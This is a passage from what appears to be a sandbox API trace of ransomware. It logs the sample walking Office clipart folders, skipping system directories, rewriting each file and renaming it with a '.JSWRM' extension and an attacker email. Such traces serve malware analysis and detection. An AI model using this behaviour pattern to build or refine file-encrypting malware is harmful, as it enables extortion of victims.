lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0095.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0095.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0095.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0095.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0095.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0095.132] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02759J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02759j.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02759J.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02759j.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0095.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0095.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0095.132] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103f89f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103f89f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc5d7, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02810J.JPG", cAlternateFileName="")) returned 1 [0095.133] lstrcmpiW (lpString1="PH02810J.JPG", lpString2=".") returned 1 [0095.133] lstrcmpiW (lpString1="PH02810J.JPG", lpString2="..") returned 1 [0095.133] lstrcmpiW (lpString1="PH02810J.JPG", lpString2="...") returned 1 [0095.133] lstrcmpiW (lpString1="PH02810J.JPG", lpString2="windows") returned -1 [0095.133] lstrcmpiW (lpString1="PH02810J.JPG", lpString2="recovery") returned -1 [0095.133] lstrcmpiW (lpString1="PH02810J.JPG", lpString2="perflogs") returned 1 [0095.133] lstrcmpiW (lpString1="PH02810J.JPG", lpString2="documents and settings") returned 1 [0095.133] lstrcmpiW (lpString1="PH02810J.JPG", lpString2="$RECYCLE.BIN") returned 1 [0095.133] lstrcmpiW (lpString1="PH02810J.JPG", lpString2="system volume information") returned -1 [0095.133] lstrcmpiW (lpString1="PH02810J.JPG", lpString2="msocache") returned 1 [0095.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0095.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02810J.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02810J.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02810J.JPG", lpUsedDefaultChar=0x0) returned 12 [0095.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0095.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0095.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02810J.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02810J.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02810J.JPG", lpUsedDefaultChar=0x0) returned 12 [0095.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0095.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0095.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0095.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0095.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02810J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02810j.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.134] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=50647) returned 1 [0095.134] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc5d0) returned 0x24d210 [0095.134] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xc5d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xc5d0, lpOverlapped=0x0) returned 1 [0095.139] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.139] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xc5d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xc5d0, lpOverlapped=0x0) returned 1 [0095.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.140] CloseHandle (hObject=0x314) returned 1 [0095.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0095.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0095.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.140] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0095.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0095.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0095.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0095.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0095.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0095.141] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02810J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02810j.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02810J.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02810j.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0095.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0095.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0095.141] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1027b233, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1027b233, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1027b233, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf438, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02829J.JPG", cAlternateFileName="")) returned 1 [0095.141] lstrcmpiW (lpString1="PH02829J.JPG", lpString2=".") returned 1 [0095.142] lstrcmpiW (lpString1="PH02829J.JPG", lpString2="..") returned 1 [0095.142] lstrcmpiW (lpString1="PH02829J.JPG", lpString2="...") returned 1 [0095.142] lstrcmpiW (lpString1="PH02829J.JPG", lpString2="windows") returned -1 [0095.142] lstrcmpiW (lpString1="PH02829J.JPG", lpString2="recovery") returned -1 [0095.142] lstrcmpiW (lpString1="PH02829J.JPG", lpString2="perflogs") returned 1 [0095.142] lstrcmpiW (lpString1="PH02829J.JPG", lpString2="documents and settings") returned 1 [0095.142] lstrcmpiW (lpString1="PH02829J.JPG", lpString2="$RECYCLE.BIN") returned 1 [0095.142] lstrcmpiW (lpString1="PH02829J.JPG", lpString2="system volume information") returned -1 [0095.142] lstrcmpiW (lpString1="PH02829J.JPG", lpString2="msocache") returned 1 [0095.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0095.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02829J.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02829J.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02829J.JPG", lpUsedDefaultChar=0x0) returned 12 [0095.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0095.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0095.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02829J.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02829J.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02829J.JPG", lpUsedDefaultChar=0x0) returned 12 [0095.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0095.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0095.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0095.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0095.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02829J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02829j.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.143] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=62520) returned 1 [0095.143] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf430) returned 0x24d210 [0095.143] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xf430, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xf430, lpOverlapped=0x0) returned 1 [0095.150] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.150] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xf430, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xf430, lpOverlapped=0x0) returned 1 [0095.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.151] CloseHandle (hObject=0x314) returned 1 [0095.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0095.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0095.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0095.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0095.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0095.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0095.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0095.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0095.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.151] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02829J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02829j.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02829J.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02829j.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0095.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0095.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0095.152] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102a14ae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102a14ae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102c771c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30f2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02845G.GIF", cAlternateFileName="")) returned 1 [0095.152] lstrcmpiW (lpString1="PH02845G.GIF", lpString2=".") returned 1 [0095.152] lstrcmpiW (lpString1="PH02845G.GIF", lpString2="..") returned 1 [0095.152] lstrcmpiW (lpString1="PH02845G.GIF", lpString2="...") returned 1 [0095.152] lstrcmpiW (lpString1="PH02845G.GIF", lpString2="windows") returned -1 [0095.152] lstrcmpiW (lpString1="PH02845G.GIF", lpString2="recovery") returned -1 [0095.152] lstrcmpiW (lpString1="PH02845G.GIF", lpString2="perflogs") returned 1 [0095.153] lstrcmpiW (lpString1="PH02845G.GIF", lpString2="documents and settings") returned 1 [0095.153] lstrcmpiW (lpString1="PH02845G.GIF", lpString2="$RECYCLE.BIN") returned 1 [0095.153] lstrcmpiW (lpString1="PH02845G.GIF", lpString2="system volume information") returned -1 [0095.153] lstrcmpiW (lpString1="PH02845G.GIF", lpString2="msocache") returned 1 [0095.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0095.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02845G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02845G.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02845G.GIF", lpUsedDefaultChar=0x0) returned 12 [0095.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0095.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0095.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02845G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02845G.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02845G.GIF", lpUsedDefaultChar=0x0) returned 12 [0095.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0095.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0095.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0095.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0095.153] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02845G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02845g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.156] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12530) returned 1 [0095.156] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30f0) returned 0x24d210 [0095.157] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x30f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x30f0, lpOverlapped=0x0) returned 1 [0095.159] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.159] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x30f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x30f0, lpOverlapped=0x0) returned 1 [0095.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.159] CloseHandle (hObject=0x314) returned 1 [0095.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0095.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0095.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0095.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0095.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0095.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0095.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0095.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0095.160] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02845G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02845g.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02845G.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02845g.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0095.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0095.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0095.161] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102c771c, 